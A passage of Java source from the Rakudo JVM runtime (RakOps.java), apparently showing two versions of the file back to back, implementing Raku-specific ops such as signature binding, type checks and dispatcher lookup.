CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); private static final CallSiteDescriptor storeThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ }, null); public static SixModelObject p6store(SixModelObject cont, SixModelObject value, ThreadContext tc) { ContainerSpec spec = cont.st.ContainerSpec; if (spec != null) { spec.store(tc, cont, Ops.decont(value, tc)); } else { SixModelObject meth = Ops.findmethodNonFatal(cont, "STORE", tc); if (Ops.isnull(meth) == 0) { Ops.invokeDirect(tc, meth, STORE, new Object[] { cont, value }); } else { SixModelObject thrower = getThrower(tc, "X::Assignment::RO"); if (thrower == null) ExceptionHandling.dieInternal(tc, "Cannot assign to a non-container"); else Ops.invokeDirect(tc, thrower, storeThrower, new Object[] { cont }); } } return cont; } private static final CallSiteDescriptor genIns = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); private static final CallSiteDescriptor rvThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); public static SixModelObject p6typecheckrv(SixModelObject rv, SixModelObject routine, SixModelObject bypassType, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject sig = routine.get_attribute_boxed(tc, gcx.Code, "$!signature", HINT_CODE_SIG); SixModelObject rtype = sig.get_attribute_boxed(tc, gcx.Signature, "$!returns", HINT_SIG_RETURNS); if (rtype != null) { /* The return type could be generic. In that case we have * to call instantiate_generic before doing the type check. */ SixModelObject HOW = rtype.st.HOW; SixModelObject archetypesMeth = Ops.findmethod(HOW, "archetypes", tc); Ops.invokeDirect(tc, archetypesMeth, Ops.invocantCallSite, new Object[] { HOW, rtype }); SixModelObject Archetypes = Ops.result_o(tc.curFrame); SixModelObject genericMeth = Ops.findmethodNonFatal(Archetypes, "generic", tc); if (genericMeth != null) { Ops.invokeDirect(tc, genericMeth, Ops.invocantCallSite, new Object[] { Archetypes }); if (Ops.istrue(Ops.result_o(tc.curFrame), tc) == 1) { SixModelObject ig = Ops.findmethod(HOW, "instantiate_generic", tc); SixModelObject ContextRef = tc.gc.ContextRef; SixModelObject cc = ContextRef.st.REPR.allocate(tc, ContextRef.st); ((ContextRefInstance)cc).context = tc.curFrame; Ops.invokeDirect(tc, ig, genIns, new Object[] { HOW, rtype, cc }); rtype = Ops.result_o(tc.curFrame); } } SixModelObject decontValue = Ops.decont(rv, tc); if (Ops.istype(decontValue, rtype, tc) == 0) { /* Straight type check failed, but it's possible we're returning * an Int that can unbox into an int or similar. */ StorageSpec spec = rtype.st.REPR.get_storage_spec(tc, rtype.st); if (spec.inlineable == 0 || Ops.istype(rtype, decontValue.st.WHAT, tc) == 0) { if (Ops.istype(decontValue.st.WHAT, bypassType, tc) == 0) { SixModelObject thrower = getThrower(tc, "X::TypeCheck::Return"); if (thrower == null) throw ExceptionHandling.dieInternal(tc, "Type check failed for return value"); else Ops.invokeDirect(tc, thrower, rvThrower, new Object[] { decontValue, rtype }); } } } } return rv; } private static final CallSiteDescriptor baThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); public static SixModelObject p6bindassert(SixModelObject value, SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); if (type != gcx.Mu) { SixModelObject decont = Ops.decont(value, tc); if (Ops.istype(decont, type, tc) == 0) { SixModelObject thrower = getThrower(tc, "X::TypeCheck::Binding"); if (thrower == null) ExceptionHandling.dieInternal(tc, "Type check failed in binding"); else Ops.invokeDirect(tc, thrower, baThrower, new Object[] { value, type }); } } return value; } public static SixModelObject p6capturelex(SixModelObject codeObj, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); CodeRef closure = (CodeRef)codeObj.get_attribute_boxed(tc, gcx.Code, "$!do", HINT_CODE_DO); StaticCodeInfo wantedStaticInfo = closure.staticInfo.outerStaticInfo; if (tc.curFrame.codeRef.staticInfo == wantedStaticInfo) closure.outer = tc.curFrame; else if (tc.curFrame.outer.codeRef.staticInfo == wantedStaticInfo) closure.outer = tc.curFrame.outer; return codeObj; } public static SixModelObject p6getouterctx(SixModelObject codeObj, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); codeObj = Ops.decont(codeObj, tc); CodeRef closure = (CodeRef)codeObj.get_attribute_boxed(tc, gcx.Code, "$!do", HINT_CODE_DO); SixModelObject ContextRef = tc.gc.ContextRef; SixModelObject wrap = ContextRef.st.REPR.allocate(tc, ContextRef.st); ((ContextRefInstance)wrap).context = closure.outer; return wrap; } public static SixModelObject p6captureouters2(SixModelObject capList, SixModelObject target, ThreadContext tc) { if (!(target instanceof CodeRef)) ExceptionHandling.dieInternal(tc, "p6captureouters target must be a CodeRef"); CallFrame cf = ((CodeRef)target).outer; if (cf == null) return capList; long elems = capList.elems(tc); for (long i = 0; i < elems; i++) { SixModelObject closure = capList.at_pos_boxed(tc, i); CallFrame ctxToDiddle = ((CodeRef)closure).outer; ctxToDiddle.outer = cf; } return capList; } public static SixModelObject p6bindattrinvres(SixModelObject obj, SixModelObject ch, String name, SixModelObject value, ThreadContext tc) { obj.bind_attribute_boxed(tc, Ops.decont(ch, tc), name, STable.NO_HINT, value); if (obj.sc != null) Ops.scwbObject(tc, obj); return obj; } public static SixModelObject getThrower(ThreadContext tc, String type) { SixModelObject exHash = Ops.gethllsym("Raku", "P6EX", tc); return exHash == null ? null : Ops.atkey(exHash, type, tc); } private static CallFrame find_common_ctx(CallFrame ctx1, CallFrame ctx2) { int depth1 = 0; int depth2 = 0; CallFrame ctx; for (ctx = ctx1; ctx != null; ctx = ctx.caller, depth1++) if (ctx == ctx2) return ctx; for (ctx = ctx2; ctx != null; ctx = ctx.caller, depth2++) if (ctx == ctx1) return ctx; for (; depth1 > depth2; depth2++) ctx1 = ctx1.caller; for (; depth2 > depth1; depth1++) ctx2 = ctx2.caller; while (ctx1 != ctx2) { ctx1 = ctx1.caller; ctx2 = ctx2.caller; } return ctx1; } private static SixModelObject getremotelex(CallFrame pad, String name) { /* use for sub_find_pad */ CallFrame curFrame = pad; while (curFrame != null) { Integer found = curFrame.codeRef.staticInfo.oTryGetLexicalIdx(name); if (found != null) return curFrame.oLex[found]; curFrame = curFrame.outer; } return null; } public static String tclc(String in, ThreadContext tc) { if (in.length() == 0) return in; int first = in.codePointAt(0); return new String(Character.toChars(Character.toTitleCase(first))) + in.substring(Character.charCount(first)).toLowerCase(); } public static long p6stateinit(ThreadContext tc) { return tc.curFrame.stateInit ? 1 : 0; } public static SixModelObject p6setfirstflag(SixModelObject codeObj, ThreadContext tc) { ThreadExt tcx = key.getTC(tc); tcx.firstPhaserCodeBlock = codeObj; return codeObj; } public static long p6takefirstflag(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); boolean matches = tcx.firstPhaserCodeBlock == tc.curFrame.codeRef; tcx.firstPhaserCodeBlock = null; return matches ? 1 : 0; } public static SixModelObject p6setpre(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); tcx.prePhaserFrames.add(tc.curFrame); return null; } public static SixModelObject p6clearpre(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); tcx.prePhaserFrames.remove(tc.curFrame); return null; } public static long p6inpre(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); return tcx.prePhaserFrames.remove(tc.curFrame.caller) ? 1 : 0; } private static final CallSiteDescriptor dispVivifier = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); private static final CallSiteDescriptor dispThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_STR }, null); public static SixModelObject p6finddispatcher(String usage, ThreadContext tc) { SixModelObject dispatcher = null; CallFrame ctx = tc.curFrame.caller; while (ctx != null) { /* Do we have a dispatcher here? */ StaticCodeInfo sci = ctx.codeRef.staticInfo; Integer dispLexIdx = sci.oTryGetLexicalIdx("$*DISPATCHER"); if (dispLexIdx != null) { SixModelObject maybeDispatcher = ctx.oLex[dispLexIdx]; if (maybeDispatcher != null) { dispatcher = maybeDispatcher; if (dispatcher instanceof TypeObject) { /* Need to vivify it. */ SixModelObject meth = Ops.findmethod(dispatcher, "vivify_for", tc); SixModelObject p6sub = ctx.codeRef.codeObject; SixModelObject ContextRef = tc.gc.ContextRef; SixModelObject wrap = ContextRef.st.REPR.allocate(tc, ContextRef.st); ((ContextRefInstance)wrap).context = ctx; SixModelObject CallCapture = tc.gc.CallCapture; CallCaptureInstance cc = (CallCaptureInstance)CallCapture.st.REPR.allocate(tc, CallCapture.st); cc.descriptor = ctx.csd; cc.args = ctx.args; Ops.invokeDirect(tc, meth, dispVivifier, new Object[] { dispatcher, p6sub, wrap, cc }); dispatcher = Ops.result_o(tc.curFrame); ctx.oLex[dispLexIdx] = dispatcher; } break; } } /* Follow dynamic chain. */ ctx = ctx.caller; } if (dispatcher == null) { SixModelObject thrower = getThrower(tc, "X::NoDispatcher"); if (thrower == null) { ExceptionHandling.dieInternal(tc, usage + " is not in the dynamic scope of a dispatcher"); } else { Ops.invokeDirect(tc, thrower, dispThrower, new Object[] { usage }); } } return dispatcher; } public static SixModelObject p6argsfordispatcher(SixModelObject disp, ThreadContext tc) { SixModelObject result = null; CallFrame ctx = tc.curFrame; while (ctx != null) { /* Do we have the dispatcher we're looking for? */ StaticCodeInfo sci = ctx.codeRef.staticInfo; Integer dispLexIdx = sci.oTryGetLexicalIdx("$*DISPATCHER"); if (dispLexIdx != null) { SixModelObject maybeDispatcher = ctx.oLex[dispLexIdx]; if (maybeDispatcher == disp) { /* Found; grab args. */ SixModelObject CallCapture = tc.gc.CallCapture; CallCaptureInstance cc = (CallCaptureInstance)CallCapture.st.REPR.allocate(tc, CallCapture.st); cc.descriptor = ctx.csd; cc.args = ctx.args; result = cc; break; } } /* Follow dynamic chain. */ ctx = ctx.caller; } if (result == null) throw ExceptionHandling.dieInternal(tc, "Could not find arguments for dispatcher"); return result; } public static SixModelObject p6staticouter(SixModelObject code, ThreadContext tc) { if (code instanceof CodeRef) return ((CodeRef)code).staticInfo.outerStaticInfo.staticCode; else throw ExceptionHandling.dieInternal(tc, "p6staticouter must be used on a CodeRef"); } public static SixModelObject jvmrakudointerop(ThreadContext tc) { GlobalExt gcx = key.getGC(tc); return BootJavaInterop.RuntimeSupport.boxJava(gcx.rakudoInterop, gcx.rakudoInterop.getSTableForClass(RakudoJavaInterop.class)); } }
src/vm/jvm/runtime/org/raku/rakudo/RakOps.java
package org.raku.rakudo; import java.util.ArrayList; import java.util.Arrays; import java.util.Calendar; import java.util.Comparator; import org.raku.nqp.runtime.*; import org.raku.nqp.sixmodel.*; import org.raku.nqp.sixmodel.reprs.CallCaptureInstance; import org.raku.nqp.sixmodel.reprs.ContextRefInstance; import org.raku.nqp.sixmodel.reprs.NativeRefInstance; import org.raku.nqp.sixmodel.reprs.VMArrayInstance; /** * Contains implementation of nqp:: ops specific to Rakudo */ @SuppressWarnings("unused") public final class RakOps { public static final boolean DEBUG_MODE = false; public static class ThreadExt { public SixModelObject firstPhaserCodeBlock; public ArrayList<CallFrame> prePhaserFrames = new ArrayList<CallFrame>(); public ThreadExt(ThreadContext tc) { } } public static class GlobalExt { public SixModelObject Mu; public SixModelObject Any; public SixModelObject Code; public SixModelObject Routine; public SixModelObject Signature; public SixModelObject Parameter; public SixModelObject Int; public SixModelObject Num; public SixModelObject Str; public SixModelObject List; public SixModelObject IterationBuffer; public SixModelObject Iterable; public SixModelObject Array; public SixModelObject Nil; public SixModelObject Map; public SixModelObject Hash; public SixModelObject Junction; public SixModelObject Scalar; public SixModelObject Capture; public SixModelObject ContainerDescriptor; public SixModelObject False; public SixModelObject True; public SixModelObject AutoThreader; public SixModelObject Positional; public SixModelObject PositionalBindFailover; public SixModelObject Associative; public SixModelObject EMPTYARR; public SixModelObject EMPTYHASH; public RakudoJavaInterop rakudoInterop; public SixModelObject JavaHOW; boolean initialized; public GlobalExt(ThreadContext tc) {} } public static ContextKey<ThreadExt, GlobalExt> key = new ContextKey< >(ThreadExt.class, GlobalExt.class); /* Parameter hints for fast lookups. */ private static final int HINT_CODE_DO = 0; private static final int HINT_CODE_SIG = 1; private static final int HINT_ROUTINE_RW = 8; private static final int HINT_SIG_PARAMS = 0; private static final int HINT_SIG_RETURNS = 1; private static final int HINT_SIG_CODE = 4; public static final int HINT_CD_OF = 0; public static final int HINT_CD_NAME = 1; public static final int HINT_CD_DEFAULT = 2; public static SixModelObject p6init(ThreadContext tc) { GlobalExt gcx = key.getGC(tc); if (!gcx.initialized) { tc.gc.contConfigs.put("value_desc_cont", new RakudoContainerConfigurer()); SixModelObject BOOTArray = tc.gc.BOOTArray; gcx.EMPTYARR = BOOTArray.st.REPR.allocate(tc, BOOTArray.st); SixModelObject BOOTHash = tc.gc.BOOTHash; gcx.EMPTYHASH = BOOTHash.st.REPR.allocate(tc, BOOTHash.st); gcx.rakudoInterop = new RakudoJavaInterop(tc.gc); gcx.initialized = true; } return null; } public static SixModelObject p6setitertype(SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Iterable = type; return type; } public static SixModelObject p6setassociativetype(SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Associative = type; return type; } public static SixModelObject p6setiterbuftype(SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.IterationBuffer = type; return type; } public static SixModelObject p6settypes(SixModelObject conf, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Mu = conf.at_key_boxed(tc, "Mu"); gcx.Any = conf.at_key_boxed(tc, "Any"); gcx.Code = conf.at_key_boxed(tc, "Code"); gcx.Routine = conf.at_key_boxed(tc, "Routine"); gcx.Signature = conf.at_key_boxed(tc, "Signature"); gcx.Parameter = conf.at_key_boxed(tc, "Parameter"); gcx.Int = conf.at_key_boxed(tc, "Int"); gcx.Num = conf.at_key_boxed(tc, "Num"); gcx.Str = conf.at_key_boxed(tc, "Str"); gcx.List = conf.at_key_boxed(tc, "List"); gcx.IterationBuffer = conf.at_key_boxed(tc, "IterationBuffer"); gcx.Iterable = conf.at_key_boxed(tc, "Iterable"); gcx.Array = conf.at_key_boxed(tc, "Array"); gcx.Nil = conf.at_key_boxed(tc, "Nil"); gcx.Map = conf.at_key_boxed(tc, "Map"); gcx.Hash = conf.at_key_boxed(tc, "Hash"); gcx.Junction = conf.at_key_boxed(tc, "Junction"); gcx.Scalar = conf.at_key_boxed(tc, "Scalar"); gcx.Capture = conf.at_key_boxed(tc, "Capture"); gcx.ContainerDescriptor = conf.at_key_boxed(tc, "ContainerDescriptor"); gcx.False = conf.at_key_boxed(tc, "False"); gcx.True = conf.at_key_boxed(tc, "True"); gcx.Associative = conf.at_key_boxed(tc, "Associative"); gcx.JavaHOW = conf.at_key_boxed(tc, "Metamodel").st.WHO.at_key_boxed(tc, "JavaHOW"); return conf; } public static SixModelObject p6setautothreader(SixModelObject autoThreader, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.AutoThreader = autoThreader; return autoThreader; } public static SixModelObject p6configposbindfailover(SixModelObject p, SixModelObject pbf, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); gcx.Positional = p; gcx.PositionalBindFailover = pbf; return p; } public static SixModelObject booleanize(int x, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); return x == 0 ? gcx.False : gcx.True; } public static SixModelObject p6definite(SixModelObject obj, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); return Ops.isnull(obj) == 1 || Ops.decont(obj, tc) instanceof TypeObject ? gcx.False : gcx.True; } public static SixModelObject p6box_i(long value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Int.st.REPR.allocate(tc, gcx.Int.st); res.set_int(tc, value); return res; } public static SixModelObject p6box_u(long value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Int.st.REPR.allocate(tc, gcx.Int.st); res.set_int(tc, value); return res; } public static SixModelObject p6box_n(double value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Num.st.REPR.allocate(tc, gcx.Num.st); res.set_num(tc, value); return res; } public static SixModelObject p6box_s(String value, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject res = gcx.Str.st.REPR.allocate(tc, gcx.Str.st); res.set_str(tc, value); return res; } public static SixModelObject p6argvmarray(ThreadContext tc, CallSiteDescriptor csd, Object[] args) { SixModelObject BOOTArray = tc.gc.BOOTArray; SixModelObject res = BOOTArray.st.REPR.allocate(tc, BOOTArray.st); for (int i = 0; i < csd.numPositionals; i++) { SixModelObject toBind; switch (csd.argFlags[i]) { case CallSiteDescriptor.ARG_INT: toBind = p6box_i((long)args[i], tc); break; case CallSiteDescriptor.ARG_UINT: toBind = p6box_u((long)args[i], tc); break; case CallSiteDescriptor.ARG_NUM: toBind = p6box_n((double)args[i], tc); break; case CallSiteDescriptor.ARG_STR: toBind = p6box_s((String)args[i], tc); break; default: toBind = Ops.hllize((SixModelObject)args[i], tc); break; } res.bind_pos_boxed(tc, i, toBind); } return res; } public static CallSiteDescriptor p6bindsig(ThreadContext tc, CallSiteDescriptor csd, Object[] args) { /* Do any flattening before processing begins. */ CallFrame cf = tc.curFrame; if (csd.hasFlattening) { csd = csd.explodeFlattening(cf, args); args = tc.flatArgs; } cf.csd = csd; cf.args = args; /* Look up parameters to bind. */ if (DEBUG_MODE) { if (cf.codeRef.name != null) System.err.println("Binding for " + cf.codeRef.name); } GlobalExt gcx = key.getGC(tc); SixModelObject sig = cf.codeRef.codeObject .get_attribute_boxed(tc, gcx.Code, "$!signature", HINT_CODE_SIG); SixModelObject params = sig .get_attribute_boxed(tc, gcx.Signature, "@!params", HINT_SIG_PARAMS); /* Run binder, and handle any errors. */ Object[] error = new Object[3]; switch (Binder.bind(tc, gcx, cf, params, csd, args, false, error)) { case Binder.BIND_RESULT_FAIL: if (error[0] instanceof String) { throw ExceptionHandling.dieInternal(tc, (String) error[0]); } else { Ops.invokeDirect(tc, (SixModelObject) error[0], (CallSiteDescriptor) error[1], (Object[]) error[2]); } case Binder.BIND_RESULT_JUNCTION: /* Invoke the auto-threader. */ csd = csd.injectInvokee(tc, args, cf.codeRef.codeObject); args = tc.flatArgs; Ops.invokeDirect(tc, gcx.AutoThreader, csd, args); Ops.return_o( Ops.result_o(cf), cf); /* Return null to indicate immediate return to the routine. */ return null; } /* The binder may, for a variety of reasons, wind up calling Raku code and overwriting flatArgs, so it needs to be set at the end to return reliably */ tc.flatArgs = args; return csd; } public static SixModelObject p6bindcaptosig(SixModelObject sig, SixModelObject cap, ThreadContext tc) { CallFrame cf = tc.curFrame; GlobalExt gcx = key.getGC(tc); CallSiteDescriptor csd = Binder.explodeCapture(tc, gcx, cap); SixModelObject params = sig.get_attribute_boxed(tc, gcx.Signature, "@!params", HINT_SIG_PARAMS); Object[] error = new Object[3]; switch (Binder.bind(tc, gcx, cf, params, csd, tc.flatArgs, false, error)) { case Binder.BIND_RESULT_FAIL: case Binder.BIND_RESULT_JUNCTION: if (error[0] instanceof String) { throw ExceptionHandling.dieInternal(tc, (String) error[0]); } else { Ops.invokeDirect(tc, (SixModelObject) error[0], (CallSiteDescriptor) error[1], (Object[]) error[2]); } default: return sig; } } public static long p6isbindable(SixModelObject sig, SixModelObject cap, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); CallSiteDescriptor csd; Object[] args; if (cap instanceof CallCaptureInstance) { CallCaptureInstance cc = (CallCaptureInstance)cap; csd = cc.descriptor; args = cc.args; } else { csd = Binder.explodeCapture(tc, gcx, cap); args = tc.flatArgs; } SixModelObject params = sig.get_attribute_boxed(tc, gcx.Signature, "@!params", HINT_SIG_PARAMS); SixModelObject codeObj = sig.get_attribute_boxed(tc, gcx.Signature, "$!code", HINT_SIG_CODE); CodeRef cr = (CodeRef)codeObj.get_attribute_boxed(tc, gcx.Code, "$!do", HINT_CODE_DO); CallFrame cf = new CallFrame(tc, cr); try { switch (Binder.bind(tc, gcx, cf, params, csd, args, false, null)) { case Binder.BIND_RESULT_FAIL: return 0; default: return 1; } } finally { tc.curFrame = tc.curFrame.caller; } } private static final CallSiteDescriptor STORE = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); private static final CallSiteDescriptor storeThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ }, null); public static SixModelObject p6store(SixModelObject cont, SixModelObject value, ThreadContext tc) { ContainerSpec spec = cont.st.ContainerSpec; if (spec != null) { spec.store(tc, cont, Ops.decont(value, tc)); } else { SixModelObject meth = Ops.findmethodNonFatal(cont, "STORE", tc); if (Ops.isnull(meth) == 0) { Ops.invokeDirect(tc, meth, STORE, new Object[] { cont, value }); } else { SixModelObject thrower = getThrower(tc, "X::Assignment::RO"); if (thrower == null) ExceptionHandling.dieInternal(tc, "Cannot assign to a non-container"); else Ops.invokeDirect(tc, thrower, storeThrower, new Object[] { cont }); } } return cont; } private static final CallSiteDescriptor rvThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); public static SixModelObject p6typecheckrv(SixModelObject rv, SixModelObject routine, SixModelObject bypassType, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); SixModelObject sig = routine.get_attribute_boxed(tc, gcx.Code, "$!signature", HINT_CODE_SIG); SixModelObject rtype = sig.get_attribute_boxed(tc, gcx.Signature, "$!returns", HINT_SIG_RETURNS); if (rtype != null) { SixModelObject decontValue = Ops.decont(rv, tc); if (Ops.istype(decontValue, rtype, tc) == 0) { /* Straight type check failed, but it's possible we're returning * an Int that can unbox into an int or similar. */ StorageSpec spec = rtype.st.REPR.get_storage_spec(tc, rtype.st); if (spec.inlineable == 0 || Ops.istype(rtype, decontValue.st.WHAT, tc) == 0) { if (Ops.istype(decontValue.st.WHAT, bypassType, tc) == 0) { SixModelObject thrower = getThrower(tc, "X::TypeCheck::Return"); if (thrower == null) throw ExceptionHandling.dieInternal(tc, "Type check failed for return value"); else Ops.invokeDirect(tc, thrower, rvThrower, new Object[] { decontValue, rtype }); } } } } return rv; } private static final CallSiteDescriptor baThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); public static SixModelObject p6bindassert(SixModelObject value, SixModelObject type, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); if (type != gcx.Mu) { SixModelObject decont = Ops.decont(value, tc); if (Ops.istype(decont, type, tc) == 0) { SixModelObject thrower = getThrower(tc, "X::TypeCheck::Binding"); if (thrower == null) ExceptionHandling.dieInternal(tc, "Type check failed in binding"); else Ops.invokeDirect(tc, thrower, baThrower, new Object[] { value, type }); } } return value; } public static SixModelObject p6capturelex(SixModelObject codeObj, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); CodeRef closure = (CodeRef)codeObj.get_attribute_boxed(tc, gcx.Code, "$!do", HINT_CODE_DO); StaticCodeInfo wantedStaticInfo = closure.staticInfo.outerStaticInfo; if (tc.curFrame.codeRef.staticInfo == wantedStaticInfo) closure.outer = tc.curFrame; else if (tc.curFrame.outer.codeRef.staticInfo == wantedStaticInfo) closure.outer = tc.curFrame.outer; return codeObj; } public static SixModelObject p6getouterctx(SixModelObject codeObj, ThreadContext tc) { GlobalExt gcx = key.getGC(tc); codeObj = Ops.decont(codeObj, tc); CodeRef closure = (CodeRef)codeObj.get_attribute_boxed(tc, gcx.Code, "$!do", HINT_CODE_DO); SixModelObject ContextRef = tc.gc.ContextRef; SixModelObject wrap = ContextRef.st.REPR.allocate(tc, ContextRef.st); ((ContextRefInstance)wrap).context = closure.outer; return wrap; } public static SixModelObject p6captureouters2(SixModelObject capList, SixModelObject target, ThreadContext tc) { if (!(target instanceof CodeRef)) ExceptionHandling.dieInternal(tc, "p6captureouters target must be a CodeRef"); CallFrame cf = ((CodeRef)target).outer; if (cf == null) return capList; long elems = capList.elems(tc); for (long i = 0; i < elems; i++) { SixModelObject closure = capList.at_pos_boxed(tc, i); CallFrame ctxToDiddle = ((CodeRef)closure).outer; ctxToDiddle.outer = cf; } return capList; } public static SixModelObject p6bindattrinvres(SixModelObject obj, SixModelObject ch, String name, SixModelObject value, ThreadContext tc) { obj.bind_attribute_boxed(tc, Ops.decont(ch, tc), name, STable.NO_HINT, value); if (obj.sc != null) Ops.scwbObject(tc, obj); return obj; } public static SixModelObject getThrower(ThreadContext tc, String type) { SixModelObject exHash = Ops.gethllsym("Raku", "P6EX", tc); return exHash == null ? null : Ops.atkey(exHash, type, tc); } private static CallFrame find_common_ctx(CallFrame ctx1, CallFrame ctx2) { int depth1 = 0; int depth2 = 0; CallFrame ctx; for (ctx = ctx1; ctx != null; ctx = ctx.caller, depth1++) if (ctx == ctx2) return ctx; for (ctx = ctx2; ctx != null; ctx = ctx.caller, depth2++) if (ctx == ctx1) return ctx; for (; depth1 > depth2; depth2++) ctx1 = ctx1.caller; for (; depth2 > depth1; depth1++) ctx2 = ctx2.caller; while (ctx1 != ctx2) { ctx1 = ctx1.caller; ctx2 = ctx2.caller; } return ctx1; } private static SixModelObject getremotelex(CallFrame pad, String name) { /* use for sub_find_pad */ CallFrame curFrame = pad; while (curFrame != null) { Integer found = curFrame.codeRef.staticInfo.oTryGetLexicalIdx(name); if (found != null) return curFrame.oLex[found]; curFrame = curFrame.outer; } return null; } public static String tclc(String in, ThreadContext tc) { if (in.length() == 0) return in; int first = in.codePointAt(0); return new String(Character.toChars(Character.toTitleCase(first))) + in.substring(Character.charCount(first)).toLowerCase(); } public static long p6stateinit(ThreadContext tc) { return tc.curFrame.stateInit ? 1 : 0; } public static SixModelObject p6setfirstflag(SixModelObject codeObj, ThreadContext tc) { ThreadExt tcx = key.getTC(tc); tcx.firstPhaserCodeBlock = codeObj; return codeObj; } public static long p6takefirstflag(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); boolean matches = tcx.firstPhaserCodeBlock == tc.curFrame.codeRef; tcx.firstPhaserCodeBlock = null; return matches ? 1 : 0; } public static SixModelObject p6setpre(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); tcx.prePhaserFrames.add(tc.curFrame); return null; } public static SixModelObject p6clearpre(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); tcx.prePhaserFrames.remove(tc.curFrame); return null; } public static long p6inpre(ThreadContext tc) { ThreadExt tcx = key.getTC(tc); return tcx.prePhaserFrames.remove(tc.curFrame.caller) ? 1 : 0; } private static final CallSiteDescriptor dispVivifier = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ, CallSiteDescriptor.ARG_OBJ }, null); private static final CallSiteDescriptor dispThrower = new CallSiteDescriptor( new byte[] { CallSiteDescriptor.ARG_STR }, null); public static SixModelObject p6finddispatcher(String usage, ThreadContext tc) { SixModelObject dispatcher = null; CallFrame ctx = tc.curFrame.caller; while (ctx != null) { /* Do we have a dispatcher here? */ StaticCodeInfo sci = ctx.codeRef.staticInfo; Integer dispLexIdx = sci.oTryGetLexicalIdx("$*DISPATCHER"); if (dispLexIdx != null) { SixModelObject maybeDispatcher = ctx.oLex[dispLexIdx]; if (maybeDispatcher != null) { dispatcher = maybeDispatcher; if (dispatcher instanceof TypeObject) { /* Need to vivify it. */ SixModelObject meth = Ops.findmethod(dispatcher, "vivify_for", tc); SixModelObject p6sub = ctx.codeRef.codeObject; SixModelObject ContextRef = tc.gc.ContextRef; SixModelObject wrap = ContextRef.st.REPR.allocate(tc, ContextRef.st); ((ContextRefInstance)wrap).context = ctx; SixModelObject CallCapture = tc.gc.CallCapture; CallCaptureInstance cc = (CallCaptureInstance)CallCapture.st.REPR.allocate(tc, CallCapture.st); cc.descriptor = ctx.csd; cc.args = ctx.args; Ops.invokeDirect(tc, meth, dispVivifier, new Object[] { dispatcher, p6sub, wrap, cc }); dispatcher = Ops.result_o(tc.curFrame); ctx.oLex[dispLexIdx] = dispatcher; } break; } } /* Follow dynamic chain. */ ctx = ctx.caller; } if (dispatcher == null) { SixModelObject thrower = getThrower(tc, "X::NoDispatcher"); if (thrower == null) { ExceptionHandling.dieInternal(tc, usage + " is not in the dynamic scope of a dispatcher"); } else { Ops.invokeDirect(tc, thrower, dispThrower, new Object[] { usage }); } } return dispatcher; } public static SixModelObject p6argsfordispatcher(SixModelObject disp, ThreadContext tc) { SixModelObject result = null; CallFrame ctx = tc.curFrame; while (ctx != null) { /* Do we have the dispatcher we're looking for? */ StaticCodeInfo sci = ctx.codeRef.staticInfo; Integer dispLexIdx = sci.oTryGetLexicalIdx("$*DISPATCHER"); if (dispLexIdx != null) { SixModelObject maybeDispatcher = ctx.oLex[dispLexIdx]; if (maybeDispatcher == disp) { /* Found; grab args. */ SixModelObject CallCapture = tc.gc.CallCapture; CallCaptureInstance cc = (CallCaptureInstance)CallCapture.st.REPR.allocate(tc, CallCapture.st); cc.descriptor = ctx.csd; cc.args = ctx.args; result = cc; break; } } /* Follow dynamic chain. */ ctx = ctx.caller; } if (result == null) throw ExceptionHandling.dieInternal(tc, "Could not find arguments for dispatcher"); return result; } public static SixModelObject p6staticouter(SixModelObject code, ThreadContext tc) { if (code instanceof CodeRef) return ((CodeRef)code).staticInfo.outerStaticInfo.staticCode; else throw ExceptionHandling.dieInternal(tc, "p6staticouter must be used on a CodeRef"); } public static SixModelObject jvmrakudointerop(ThreadContext tc) { GlobalExt gcx = 